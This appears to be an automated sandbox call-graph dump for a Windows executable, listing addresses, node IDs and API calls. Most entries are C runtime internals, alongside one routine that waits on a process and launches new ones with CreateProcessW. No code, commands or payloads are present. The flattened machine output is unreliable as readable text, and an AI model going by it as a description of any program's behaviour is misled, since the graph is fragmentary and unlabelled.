Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7272->7273 7274 7ff7aa9583e6 7273->7274 7274->7266 7054 7ff7aa951000 7055 7ff7aa953b30 __std_exception_copy 34 API calls 7054->7055 7056 7ff7aa951029 7055->7056 7275 7ff7aa957f80 7276 7ff7aa957f88 7275->7276 7277 7ff7aa95b708 3 API calls 7276->7277 7278 7ff7aa957fb9 7276->7278 7279 7ff7aa957fb5 7276->7279 7277->7276 7281 7ff7aa957ff0 7278->7281 7282 7ff7aa95801b 7281->7282 7283 7ff7aa957ffe RtlDeleteCriticalSection 7282->7283 7284 7ff7aa95801f 7282->7284 7283->7282 7284->7279 7898 7ff7aa957c80 7901 7ff7aa957520 7898->7901 7908 7ff7aa9574e8 7901->7908 7906 7ff7aa9574a4 7 API calls 7907 7ff7aa957553 7906->7907 7909 7ff7aa9574fd 7908->7909 7910 7ff7aa9574f8 7908->7910 7912 7ff7aa957504 7909->7912 7911 7ff7aa9574a4 7 API calls 7910->7911 7911->7909 7913 7ff7aa957519 7912->7913 7914 7ff7aa957514 7912->7914 7913->7906 7915 7ff7aa9574a4 7 API calls 7914->7915 7915->7913 7285 7ff7aa95e78b 7286 7ff7aa95e7cb 7285->7286 7287 7ff7aa95ea30 7285->7287 7286->7287 7288 7ff7aa95ea12 7286->7288 7290 7ff7aa95e7ff 7286->7290 7289 7ff7aa95ea26 7287->7289 7292 7ff7aa95f540 _log10_special 12 API calls 7287->7292 7293 7ff7aa95f540 7288->7293 7292->7289 7296 7ff7aa95f560 7293->7296 7297 7ff7aa95f57a 7296->7297 7298 7ff7aa95f55b 7297->7298 7300 7ff7aa95f3a8 7297->7300 7298->7289 7301 7ff7aa95f3e8 _log10_special 7300->7301 7303 7ff7aa95f454 _log10_special 7301->7303 7311 7ff7aa95f660 7301->7311 7304 7ff7aa95f491 7303->7304 7306 7ff7aa95f461 7303->7306 7318 7ff7aa95f990 7304->7318 7314 7ff7aa95f284 7306->7314 7308 7ff7aa95f48f _log10_special 7309 7ff7aa952650 _log10_special 4 API calls 7308->7309 7310 7ff7aa95f4b9 7309->7310 7310->7298 7324 7ff7aa95f688 7311->7324 7315 7ff7aa95f2c8 _log10_special 7314->7315 7316 7ff7aa95f2dd 7315->7316 7317 7ff7aa95f990 _log10_special 7 API calls 7315->7317 7316->7308 7317->7316 7319 7ff7aa95f999 7318->7319 7320 7ff7aa95f9b0 7318->7320 7322 7ff7aa95f9a8 7319->7322 7323 7ff7aa958284 _set_fmode 7 API calls 7319->7323 7321 7ff7aa958284 _set_fmode 7 API calls 7320->7321 7321->7322 7322->7308 7323->7322 7325 7ff7aa95f6c7 _raise_exc _clrfp 7324->7325 7326 7ff7aa95f8dc RaiseException 7325->7326 7327 7ff7aa95f682 7326->7327 7327->7303 7516 7ff7aa954f08 7517 7ff7aa954f35 __except_validate_context_record 7516->7517 7518 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7517->7518 7519 7ff7aa954f3a 7518->7519 7522 7ff7aa954f94 7519->7522 7524 7ff7aa955022 7519->7524 7537 7ff7aa954fe8 7519->7537 7520 7ff7aa955090 7520->7537 7578 7ff7aa954688 7520->7578 7521 7ff7aa95500f 7563 7ff7aa953654 7521->7563 7522->7521 7526 7ff7aa954fed 7522->7526 7527 7ff7aa954fb6 7522->7527 7522->7537 7530 7ff7aa955041 7524->7530 7572 7ff7aa953a50 7524->7572 7526->7521 7529 7ff7aa954fc5 7526->7529 7539 7ff7aa95428c 7527->7539 7532 7ff7aa955139 7529->7532 7535 7ff7aa954fd7 7529->7535 7530->7520 7530->7537 7575 7ff7aa953a64 7530->7575 7534 7ff7aa957df4 _CreateFrameInfo 34 API calls 7532->7534 7536 7ff7aa95513e 7534->7536 7544 7ff7aa955420 7535->7544 7540 7ff7aa95429a 7539->7540 7541 7ff7aa957df4 _CreateFrameInfo 34 API calls 7540->7541 7543 7ff7aa9542ab 7540->7543 7542 7ff7aa9542f1 7541->7542 7543->7529 7545 7ff7aa953a50 Is_bad_exception_allowed 38 API calls 7544->7545 7546 7ff7aa95544f 7545->7546 7640 7ff7aa9541e8 7546->7640 7549 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7561 7ff7aa95546c __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 7549->7561 7550 7ff7aa955563 7551 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7550->7551 7553 7ff7aa955568 7551->7553 7552 7ff7aa95559e 7554 7ff7aa957df4 _CreateFrameInfo 34 API calls 7552->7554 7555 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7553->7555 7557 7ff7aa955573 7553->7557 7554->7557 7555->7557 7556 7ff7aa955580 __FrameHandler3::GetHandlerSearchState 7556->7537 7557->7556 7558 7ff7aa957df4 _CreateFrameInfo 34 API calls 7557->7558 7559 7ff7aa9555a9 7558->7559 7560 7ff7aa953a50 38 API calls Is_bad_exception_allowed 7560->7561 7561->7550 7561->7552 7561->7560 7562 7ff7aa953a78 __FrameHandler3::FrameUnwindToEmptyState 38 API calls 7561->7562 7562->7561 7644 7ff7aa9536b8 7563->7644 7570 7ff7aa955420 __FrameHandler3::FrameUnwindToEmptyState 38 API calls 7571 7ff7aa9536a8 7570->7571 7571->7537 7573 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7572->7573 7574 7ff7aa953a59 7573->7574 7574->7530 7576 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7575->7576 7577 7ff7aa953a6d 7576->7577 7577->7520 7658 7ff7aa9555ac 7578->7658 7580 7ff7aa954b50 7581 7ff7aa957df4 _CreateFrameInfo 34 API calls 7580->7581 7583 7ff7aa954b56 7581->7583 7582 7ff7aa9547cf 7584 7ff7aa954aa1 7582->7584 7586 7ff7aa954807 7582->7586 7584->7580 7585 7ff7aa954a9f 7584->7585 7721 7ff7aa954b58 7584->7721 7588 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7585->7588 7589 7ff7aa9549d1 7586->7589 7686 7ff7aa953788 7586->7686 7592 7ff7aa954ae3 7588->7592 7589->7585 7596 7ff7aa9549ee 7589->7596 7599 7ff7aa953a50 Is_bad_exception_allowed 38 API calls 7589->7599 7590 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7594 7ff7aa954736 7590->7594 7592->7580 7595 7ff7aa954aea 7592->7595 7594->7595 7600 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7594->7600 7597 7ff7aa952650 _log10_special 4 API calls 7595->7597 7596->7585 7603 7ff7aa954a10 7596->7603 7713 7ff7aa953628 7596->7713 7598 7ff7aa954af6 7597->7598 7598->7537 7599->7596 7602 7ff7aa954746 7600->7602 7604 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7602->7604 7603->7585 7605 7ff7aa954b33 7603->7605 7606 7ff7aa954a26 7603->7606 7607 7ff7aa95474f 7604->7607 7609 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7605->7609 7608 7ff7aa954a31 7606->7608 7611 7ff7aa953a50 Is_bad_exception_allowed 38 API calls 7606->7611 7670 7ff7aa953a90 7607->7670 7615 7ff7aa955644 38 API calls 7608->7615 7613 7ff7aa954b39 7609->7613 7611->7608 7612 7ff7aa953a64 38 API calls 7631 7ff7aa954833 7612->7631 7616 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7613->7616 7617 7ff7aa954a47 7615->7617 7619 7ff7aa954b42 7616->7619 7617->7585 7622 7ff7aa9536b8 __GetUnwindTryBlock 35 API calls 7617->7622 7618 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7621 7ff7aa954791 7618->7621 7620 7ff7aa957dc8 34 API calls 7619->7620 7620->7580 7621->7582 7624 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7621->7624 7623 7ff7aa954a61 7622->7623 7718 7ff7aa9538bc RtlUnwindEx 7623->7718 7626 7ff7aa95479d 7624->7626 7627 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7626->7627 7629 7ff7aa9547a6 7627->7629 7673 7ff7aa955644 7629->7673 7631->7589 7631->7612 7692 7ff7aa954dc8 7631->7692 7706 7ff7aa9545b4 7631->7706 7634 7ff7aa9547ba 7682 7ff7aa955734 7634->7682 7636 7ff7aa954b2d 7637 7ff7aa957dc8 34 API calls 7636->7637 7637->7605 7638 7ff7aa9547c2 __CxxCallCatchBlock std::bad_alloc::bad_alloc 7638->7636 7639 7ff7aa953d54 std::_Xinvalid_argument 2 API calls 7638->7639 7639->7636 7641 7ff7aa95420a 7640->7641 7642 7ff7aa9541ff 7640->7642 7641->7549 7643 7ff7aa95428c __GetCurrentState 34 API calls 7642->7643 7643->7641 7645 7ff7aa954284 __FrameHandler3::FrameUnwindToEmptyState 34 API calls 7644->7645 7648 7ff7aa9536e6 7645->7648 7646 7ff7aa953673 7649 7ff7aa954284 7646->7649 7647 7ff7aa953710 RtlLookupFunctionEntry 7647->7648 7648->7646 7648->7647 7650 7ff7aa95428c 7649->7650 7651 7ff7aa957df4 _CreateFrameInfo 34 API calls 7650->7651 7653 7ff7aa953681 7650->7653 7652 7ff7aa9542f1 7651->7652 7654 7ff7aa9535c4 7653->7654 7656 7ff7aa95360f 7654->7656 7657 7ff7aa9535e4 7654->7657 7655 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7655->7657 7656->7570 7657->7655 7657->7656 7659 7ff7aa954284 __FrameHandler3::FrameUnwindToEmptyState 34 API calls 7658->7659 7660 7ff7aa9555d1 7659->7660 7661 7ff7aa9536b8 __GetUnwindTryBlock 35 API calls 7660->7661 7662 7ff7aa9555e6 7661->7662 7739 7ff7aa954210 7662->7739 7665 7ff7aa95561b 7667 7ff7aa954210 __GetUnwindTryBlock 35 API calls 7665->7667 7666 7ff7aa9555f8 __FrameHandler3::GetHandlerSearchState 7742 7ff7aa954248 7666->7742 7668 7ff7aa9546ea 7667->7668 7668->7580 7668->7582 7668->7590 7671 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7670->7671 7672 7ff7aa953a9e 7671->7672 7672->7580 7672->7618 7674 7ff7aa95572b 7673->7674 7679 7ff7aa95566f 7673->7679 7676 7ff7aa957df4 _CreateFrameInfo 34 API calls 7674->7676 7675 7ff7aa9547b6 7675->7582 7675->7634 7678 7ff7aa955730 7676->7678 7677 7ff7aa953a64 38 API calls 7677->7679 7679->7675 7679->7677 7680 7ff7aa953a50 Is_bad_exception_allowed 38 API calls 7679->7680 7681 7ff7aa954dc8 38 API calls 7679->7681 7680->7679 7681->7679 7683 7ff7aa9557a1 7682->7683 7685 7ff7aa955751 Is_bad_exception_allowed 7682->7685 7683->7638 7684 7ff7aa953a50 38 API calls Is_bad_exception_allowed 7684->7685 7685->7683 7685->7684 7687 7ff7aa954284 __FrameHandler3::FrameUnwindToEmptyState 34 API calls 7686->7687 7688 7ff7aa9537c6 7687->7688 7689 7ff7aa957df4 _CreateFrameInfo 34 API calls 7688->7689 7691 7ff7aa9537d4 7688->7691 7690 7ff7aa9538b8 7689->7690 7691->7631 7693 7ff7aa954e84 7692->7693 7694 7ff7aa954df5 7692->7694 7693->7631 7695 7ff7aa953a50 Is_bad_exception_allowed 38 API calls 7694->7695 7696 7ff7aa954dfe 7695->7696 7696->7693 7697 7ff7aa953a50 Is_bad_exception_allowed 38 API calls 7696->7697 7698 7ff7aa954e17 7696->7698 7697->7698 7698->7693 7699 7ff7aa954e43 7698->7699 7700 7ff7aa953a50 Is_bad_exception_allowed 38 API calls 7698->7700 7701 7ff7aa953a64 38 API calls 7699->7701 7700->7699 7702 7ff7aa954e57 7701->7702 7702->7693 7703 7ff7aa954e70 7702->7703 7704 7ff7aa953a50 Is_bad_exception_allowed 38 API calls 7702->7704 7705 7ff7aa953a64 38 API calls 7703->7705 7704->7703 7705->7693 7707 7ff7aa9536b8 __GetUnwindTryBlock 35 API calls 7706->7707 7708 7ff7aa9545f1 7707->7708 7709 7ff7aa953a50 Is_bad_exception_allowed 38 API calls 7708->7709 7710 7ff7aa954629 7709->7710 7711 7ff7aa9538bc 5 API calls 7710->7711 7712 7ff7aa95466d 7711->7712 7712->7631 7714 7ff7aa954284 __FrameHandler3::FrameUnwindToEmptyState 34 API calls 7713->7714 7715 7ff7aa95363c 7714->7715 7716 7ff7aa9535c4 __FrameHandler3::FrameUnwindToEmptyState 38 API calls 7715->7716 7717 7ff7aa953646 7716->7717 7717->7603 7719 7ff7aa952650 _log10_special 4 API calls 7718->7719 7720 7ff7aa9539b6 7719->7720 7720->7585 7722 7ff7aa954da4 7721->7722 7723 7ff7aa954b91 7721->7723 7722->7585 7724 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7723->7724 7725 7ff7aa954b96 7724->7725 7726 7ff7aa954bb5 RtlEncodePointer 7725->7726 7727 7ff7aa954c08 7725->7727 7730 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7726->7730 7727->7722 7728 7ff7aa954c28 7727->7728 7729 7ff7aa954dbf 7727->7729 7731 7ff7aa953788 34 API calls 7728->7731 7732 7ff7aa957df4 _CreateFrameInfo 34 API calls 7729->7732 7734 7ff7aa954bc5 7730->7734 7737 7ff7aa954c4a 7731->7737 7733 7ff7aa954dc4 7732->7733 7734->7727 7745 7ff7aa953570 7734->7745 7736 7ff7aa9545b4 40 API calls 7736->7737 7737->7722 7737->7736 7738 7ff7aa953a50 38 API calls Is_bad_exception_allowed 7737->7738 7738->7737 7740 7ff7aa9536b8 __GetUnwindTryBlock 35 API calls 7739->7740 7741 7ff7aa954223 7740->7741 7741->7665 7741->7666 7743 7ff7aa9536b8 __GetUnwindTryBlock 35 API calls 7742->7743 7744 7ff7aa954262 7743->7744 7744->7668 7746 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7745->7746 7747 7ff7aa95359c 7746->7747 7747->7727 7057 7ff7aa954014 7064 7ff7aa95587c 7057->7064 7061 7ff7aa95402a 7062 7ff7aa954021 7061->7062 7063 7ff7aa9558c4 __vcrt_uninitialize_locks RtlDeleteCriticalSection 7061->7063 7063->7062 7065 7ff7aa955884 7064->7065 7067 7ff7aa9558b5 7065->7067 7068 7ff7aa95401d 7065->7068 7074 7ff7aa955b78 7065->7074 7069 7ff7aa9558c4 __vcrt_uninitialize_locks RtlDeleteCriticalSection 7067->7069 7068->7062 7070 7ff7aa95417c 7068->7070 7069->7068 7071 7ff7aa95418c 7070->7071 7072 7ff7aa955b24 _CreateFrameInfo 3 API calls 7071->7072 7073 7ff7aa9541a5 __vcrt_uninitialize_ptd 7071->7073 7072->7073 7073->7061 7075 7ff7aa9558fc __vcrt_InitializeCriticalSectionEx 2 API calls 7074->7075 7076 7ff7aa955bae 7075->7076 7077 7ff7aa955bc3 InitializeCriticalSectionAndSpinCount 7076->7077 7078 7ff7aa955bb8 7076->7078 7077->7078 7078->7065 6881 7ff7aa95b490 6882 7ff7aa95b4ed __vcrt_InitializeCriticalSectionEx 6881->6882 6884 7ff7aa95b4e8 __vcrt_InitializeCriticalSectionEx 6881->6884 6883 7ff7aa95b51d LoadLibraryExW 6883->6882 6883->6884 6884->6882 6884->6883 6885 7ff7aa95b57c LoadLibraryExW 6884->6885 6885->6882 6885->6884 7328 7ff7aa95c990 7330 7ff7aa95c9af 7328->7330 7329 7ff7aa95ca28 7336 7ff7aa952a74 7329->7336 7330->7329 7333 7ff7aa95c9bf 7330->7333 7334 7ff7aa952650 _log10_special 4 API calls 7333->7334 7335 7ff7aa95ca1e 7334->7335 7339 7ff7aa952a88 IsProcessorFeaturePresent 7336->7339 7338 7ff7aa952a82 7340 7ff7aa952a9f 7339->7340 7343 7ff7aa952b28 RtlCaptureContext RtlLookupFunctionEntry 7340->7343 7342 7ff7aa952ab3 7342->7338 7344 7ff7aa952b58 RtlVirtualUnwind 7343->7344 7345 7ff7aa952b8a 7343->7345 7344->7345 7345->7342 7916 7ff7aa95c490 7917 7ff7aa95c4bd 7916->7917 7918 7ff7aa958284 _set_fmode 7 API calls 7917->7918 7923 7ff7aa95c4d2 7917->7923 7919 7ff7aa95c4c7 7918->7919 7920 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 7919->7920 7920->7923 7921 7ff7aa952650 _log10_special 4 API calls 7922 7ff7aa95c890 7921->7922 7923->7921 6117 7ff7aa9527dc 6143 7ff7aa952c70 6117->6143 6120 7ff7aa952928 6198 7ff7aa952fb4 IsProcessorFeaturePresent 6120->6198 6121 7ff7aa9527f8 6123 7ff7aa952932 6121->6123 6133 7ff7aa952816 __scrt_release_startup_lock 6121->6133 6124 7ff7aa952fb4 6 API calls 6123->6124 6126 7ff7aa95293d _CreateFrameInfo 6124->6126 6125 7ff7aa95283b 6207 7ff7aa952e74 6126->6207 6129 7ff7aa9528c1 6149 7ff7aa9530fc 6129->6149 6131 7ff7aa9528c6 6152 7ff7aa95756c 6131->6152 6133->6125 6133->6129 6187 7ff7aa955f28 6133->6187 6140 7ff7aa9528ed 6194 7ff7aa952df4 6140->6194 6144 7ff7aa952c78 6143->6144 6145 7ff7aa952c84 __scrt_dllmain_crt_thread_attach 6144->6145 6146 7ff7aa9527f0 6145->6146 6147 7ff7aa952c91 6145->6147 6146->6120 6146->6121 6147->6146 6210 7ff7aa95403c 6147->6210 6218 7ff7aa95fd80 6149->6218 6151 7ff7aa953113 GetStartupInfoW 6151->6131 6220 7ff7aa95a000 6152->6220 6154 7ff7aa9528ce 6157 7ff7aa951290 GetCommandLineW CommandLineToArgvW 6154->6157 6155 7ff7aa95757b 6155->6154 6226 7ff7aa95a3b0 6155->6226 6158 7ff7aa9512d4 6157->6158 6159 7ff7aa951313 6158->6159 6725 7ff7aa9523f0 6158->6725 6162 7ff7aa952650 _log10_special 4 API calls 6159->6162 6161 7ff7aa951433 6163 7ff7aa9523f0 36 API calls 6161->6163 6164 7ff7aa951612 6162->6164 6165 7ff7aa95144e 6163->6165 6192 7ff7aa953140 GetModuleHandleW 6164->6192 6166 7ff7aa951557 6165->6166 6168 7ff7aa9514db 6165->6168 6166->6159 6167 7ff7aa95161d 6166->6167 6752 7ff7aa956c50 6167->6752 6739 7ff7aa9567f8 6168->6739 6173 7ff7aa951623 CloseHandle 6174 7ff7aa95162c 6173->6174 6179 7ff7aa9523f0 36 API calls 6174->6179 6175 7ff7aa951503 Sleep OpenProcess 6175->6174 6176 7ff7aa951525 GetExitCodeProcess 6175->6176 6176->6173 6177 7ff7aa95153a 6176->6177 6177->6173 6178 7ff7aa951547 CloseHandle 6177->6178 6178->6175 6180 7ff7aa951ac3 6179->6180 6747 7ff7aa9511c0 CreateProcessW 6180->6747 6182 7ff7aa951ad4 6183 7ff7aa9523f0 36 API calls 6182->6183 6184 7ff7aa95207a 6183->6184 6185 7ff7aa9511c0 8 API calls 6184->6185 6186 7ff7aa95208e 6185->6186 6188 7ff7aa955f3f 6187->6188 6189 7ff7aa955f60 6187->6189 6188->6129 6837 7ff7aa957dc8 6189->6837 6193 7ff7aa9528e9 6192->6193 6193->6126 6193->6140 6195 7ff7aa952e05 6194->6195 6196 7ff7aa952900 6195->6196 6197 7ff7aa95403c RtlDeleteCriticalSection 6195->6197 6196->6125 6197->6196 6199 7ff7aa952fda _invalid_parameter_noinfo_noreturn __scrt_get_show_window_mode 6198->6199 6200 7ff7aa952ff9 RtlCaptureContext RtlLookupFunctionEntry 6199->6200 6201 7ff7aa953022 RtlVirtualUnwind 6200->6201 6202 7ff7aa95305e __scrt_get_show_window_mode 6200->6202 6201->6202 6203 7ff7aa953090 IsDebuggerPresent 6202->6203 6204 7ff7aa961068 _invalid_parameter_noinfo_noreturn 6203->6204 6205 7ff7aa9530cf UnhandledExceptionFilter 6204->6205 6206 7ff7aa9530de _invalid_parameter_noinfo_noreturn 6205->6206 6206->6123 6208 7ff7aa952959 6207->6208 6209 7ff7aa952e97 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6207->6209 6209->6208 6211 7ff7aa95404e 6210->6211 6212 7ff7aa954044 __vcrt_uninitialize_ptd 6210->6212 6211->6146 6214 7ff7aa9558c4 6212->6214 6215 7ff7aa9558ef 6214->6215 6216 7ff7aa9558f3 6215->6216 6217 7ff7aa9558d2 RtlDeleteCriticalSection 6215->6217 6216->6211 6217->6215 6219 7ff7aa95fd70 6218->6219 6219->6151 6219->6219 6221 7ff7aa95a00d 6220->6221 6222 7ff7aa95a052 6220->6222 6230 7ff7aa9587d4 6221->6230 6222->6155 6227 7ff7aa95a33c 6226->6227 6228 7ff7aa958114 34 API calls 6227->6228 6229 7ff7aa95a360 6228->6229 6229->6155 6231 7ff7aa9587e5 FlsGetValue 6230->6231 6232 7ff7aa958800 FlsSetValue 6230->6232 6233 7ff7aa9587fa 6231->6233 6234 7ff7aa9587f2 6231->6234 6232->6234 6235 7ff7aa95880d 6232->6235 6233->6232 6236 7ff7aa9587f8 6234->6236 6288 7ff7aa957df4 6234->6288 6273 7ff7aa958ac4 6235->6273 6250 7ff7aa959ccc 6236->6250 6241 7ff7aa95883a FlsSetValue 6244 7ff7aa958858 6241->6244 6245 7ff7aa958846 FlsSetValue 6241->6245 6242 7ff7aa95882a FlsSetValue 6243 7ff7aa958833 6242->6243 6279 7ff7aa958b3c 6243->6279 6284 7ff7aa9584a4 6244->6284 6245->6243 6249 7ff7aa958b3c __free_lconv_mon 7 API calls 6249->6236 6553 7ff7aa959f3c 6250->6553 6252 7ff7aa959d01 6564 7ff7aa9599cc 6252->6564 6255 7ff7aa959d1e 6255->6222 6258 7ff7aa959d37 6259 7ff7aa958b3c __free_lconv_mon 7 API calls 6258->6259 6259->6255 6260 7ff7aa959d46 6260->6260 6577 7ff7aa95a07c 6260->6577 6263 7ff7aa959e42 6264 7ff7aa958284 _set_fmode 7 API calls 6263->6264 6266 7ff7aa959e47 6264->6266 6265 7ff7aa959e9d 6268 7ff7aa959f04 6265->6268 6588 7ff7aa9597fc 6265->6588 6269 7ff7aa958b3c __free_lconv_mon 7 API calls 6266->6269 6267 7ff7aa959e5c 6267->6265 6270 7ff7aa958b3c __free_lconv_mon 7 API calls 6267->6270 6272 7ff7aa958b3c __free_lconv_mon 7 API calls 6268->6272 6269->6255 6270->6265 6272->6255 6278 7ff7aa958ad5 _set_fmode 6273->6278 6274 7ff7aa958b26 6303 7ff7aa958284 6274->6303 6275 7ff7aa958b0a RtlAllocateHeap 6276 7ff7aa95881c 6275->6276 6275->6278 6276->6241 6276->6242 6278->6274 6278->6275 6280 7ff7aa958b72 6279->6280 6281 7ff7aa958b41 HeapFree 6279->6281 6280->6234 6281->6280 6282 7ff7aa958b5c __free_lconv_mon __vcrt_InitializeCriticalSectionEx 6281->6282 6283 7ff7aa958284 _set_fmode 6 API calls 6282->6283 6283->6280 6285 7ff7aa958556 _set_fmode 6284->6285 6323 7ff7aa9583fc 6285->6323 6287 7ff7aa95856b 6287->6249 6290 7ff7aa957dfd _CreateFrameInfo 6288->6290 6289 7ff7aa957e0c 6292 7ff7aa957e15 IsProcessorFeaturePresent 6289->6292 6295 7ff7aa957e3f _CreateFrameInfo 6289->6295 6290->6289 6443 7ff7aa95bb80 6290->6443 6293 7ff7aa957e24 6292->6293 6459 7ff7aa956964 6293->6459 6296 7ff7aa957e63 6295->6296 6301 7ff7aa957e7e 6295->6301 6297 7ff7aa958284 _set_fmode 7 API calls 6296->6297 6298 7ff7aa957e6a 6297->6298 6469 7ff7aa956c30 6298->6469 6300 7ff7aa957e76 6301->6300 6302 7ff7aa958284 _set_fmode 7 API calls 6301->6302 6302->6298 6306 7ff7aa958878 6303->6306 6305 7ff7aa95828d 6305->6276 6308 7ff7aa95888d __vcrt_InitializeCriticalSectionEx 6306->6308 6307 7ff7aa9588b9 FlsSetValue 6309 7ff7aa9588cb 6307->6309 6310 7ff7aa9588a9 6307->6310 6308->6307 6308->6310 6312 7ff7aa958ac4 _set_fmode 2 API calls 6309->6312 6311 7ff7aa958925 SetLastError 6310->6311 6311->6305 6313 7ff7aa9588da 6312->6313 6314 7ff7aa9588f8 FlsSetValue 6313->6314 6315 7ff7aa9588e8 FlsSetValue 6313->6315 6316 7ff7aa958904 FlsSetValue 6314->6316 6317 7ff7aa958916 6314->6317 6318 7ff7aa9588f1 6315->6318 6316->6318 6320 7ff7aa9584a4 _set_fmode 2 API calls 6317->6320 6319 7ff7aa958b3c __free_lconv_mon 2 API calls 6318->6319 6319->6310 6321 7ff7aa95891e 6320->6321 6322 7ff7aa958b3c __free_lconv_mon 2 API calls 6321->6322 6322->6311 6324 7ff7aa958418 6323->6324 6327 7ff7aa958698 6324->6327 6326 7ff7aa95842e 6326->6287 6328 7ff7aa9586e0 Concurrency::details::SchedulerProxy::DeleteThis 6327->6328 6329 7ff7aa9586b4 Concurrency::details::SchedulerProxy::DeleteThis 6327->6329 6328->6326 6329->6328 6331 7ff7aa95b110 6329->6331 6332 7ff7aa95b1ac 6331->6332 6335 7ff7aa95b133 6331->6335 6333 7ff7aa95b1ff 6332->6333 6336 7ff7aa958b3c __free_lconv_mon 7 API calls 6332->6336 6397 7ff7aa95b2b0 6333->6397 6335->6332 6340 7ff7aa958b3c __free_lconv_mon 7 API calls 6335->6340 6342 7ff7aa95b172 6335->6342 6337 7ff7aa95b1d0 6336->6337 6338 7ff7aa958b3c __free_lconv_mon 7 API calls 6337->6338 6341 7ff7aa95b1e4 6338->6341 6339 7ff7aa95b194 6343 7ff7aa958b3c __free_lconv_mon 7 API calls 6339->6343 6344 7ff7aa95b166 6340->6344 6345 7ff7aa958b3c __free_lconv_mon 7 API calls 6341->6345 6342->6339 6346 7ff7aa958b3c __free_lconv_mon 7 API calls 6342->6346 6348 7ff7aa95b1a0 6343->6348 6357 7ff7aa95ac40 6344->6357 6350 7ff7aa95b1f3 6345->6350 6351 7ff7aa95b188 6346->6351 6347 7ff7aa95b26a 6352 7ff7aa958b3c __free_lconv_mon 7 API calls 6348->6352 6355 7ff7aa958b3c __free_lconv_mon 7 API calls 6350->6355 6385 7ff7aa95ad4c 6351->6385 6352->6332 6353 7ff7aa95b20b 6353->6347 6354 7ff7aa958b3c 7 API calls __free_lconv_mon 6353->6354 6354->6353 6355->6333 6358 7ff7aa95ad44 6357->6358 6359 7ff7aa95ac49 6357->6359 6358->6342 6360 7ff7aa95ac63 6359->6360 6361 7ff7aa958b3c __free_lconv_mon 7 API calls 6359->6361 6362 7ff7aa95ac75 6360->6362 6363 7ff7aa958b3c __free_lconv_mon 7 API calls 6360->6363 6361->6360 6364 7ff7aa95ac87 6362->6364 6365 7ff7aa958b3c __free_lconv_mon 7 API calls 6362->6365 6363->6362 6366 7ff7aa95ac99 6364->6366 6367 7ff7aa958b3c __free_lconv_mon 7 API calls 6364->6367 6365->6364 6368 7ff7aa95acab 6366->6368 6369 7ff7aa958b3c __free_lconv_mon 7 API calls 6366->6369 6367->6366 6370 7ff7aa95acbd 6368->6370 6371 7ff7aa958b3c __free_lconv_mon 7 API calls 6368->6371 6369->6368 6372 7ff7aa95accf 6370->6372 6374 7ff7aa958b3c __free_lconv_mon 7 API calls 6370->6374 6371->6370 6373 7ff7aa95ace1 6372->6373 6375 7ff7aa958b3c __free_lconv_mon 7 API calls 6372->6375 6376 7ff7aa95acf3 6373->6376 6377 7ff7aa958b3c __free_lconv_mon 7 API calls 6373->6377 6374->6372 6375->6373 6378 7ff7aa95ad05 6376->6378 6379 7ff7aa958b3c __free_lconv_mon 7 API calls 6376->6379 6377->6376 6380 7ff7aa95ad1a 6378->6380 6381 7ff7aa958b3c __free_lconv_mon 7 API calls 6378->6381 6379->6378 6382 7ff7aa95ad2f 6380->6382 6383 7ff7aa958b3c __free_lconv_mon 7 API calls 6380->6383 6381->6380 6382->6358 6384 7ff7aa958b3c __free_lconv_mon 7 API calls 6382->6384 6383->6382 6384->6358 6386 7ff7aa95ad51 6385->6386 6395 7ff7aa95adb2 6385->6395 6387 7ff7aa958b3c __free_lconv_mon 7 API calls 6386->6387 6389 7ff7aa95ad6a 6386->6389 6387->6389 6388 7ff7aa95ad7c 6391 7ff7aa95ad8e 6388->6391 6392 7ff7aa958b3c __free_lconv_mon 7 API calls 6388->6392 6389->6388 6390 7ff7aa958b3c __free_lconv_mon 7 API calls 6389->6390 6390->6388 6393 7ff7aa95ada0 6391->6393 6394 7ff7aa958b3c __free_lconv_mon 7 API calls 6391->6394 6392->6391 6393->6395 6396 7ff7aa958b3c __free_lconv_mon 7 API calls 6393->6396 6394->6393 6395->6339 6396->6395 6398 7ff7aa95b2e1 6397->6398 6399 7ff7aa95b2b5 6397->6399 6398->6353 6399->6398 6403 7ff7aa95adec 6399->6403 6402 7ff7aa958b3c __free_lconv_mon 7 API calls 6402->6398 6404 7ff7aa95aee4 6403->6404 6405 7ff7aa95adf5 6403->6405 6404->6402 6439 7ff7aa95adb8 6405->6439 6408 7ff7aa95adb8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6409 7ff7aa95ae1e 6408->6409 6410 7ff7aa95adb8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6409->6410 6411 7ff7aa95ae2c 6410->6411 6412 7ff7aa95adb8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6411->6412 6413 7ff7aa95ae3a 6412->6413 6414 7ff7aa95adb8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6413->6414 6415 7ff7aa95ae49 6414->6415 6416 7ff7aa958b3c __free_lconv_mon 7 API calls 6415->6416 6417 7ff7aa95ae55 6416->6417 6418 7ff7aa958b3c __free_lconv_mon 7 API calls 6417->6418 6419 7ff7aa95ae61 6418->6419 6420 7ff7aa958b3c __free_lconv_mon 7 API calls 6419->6420 6421 7ff7aa95ae6d 6420->6421 6422 7ff7aa95adb8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6421->6422 6423 7ff7aa95ae7b 6422->6423 6424 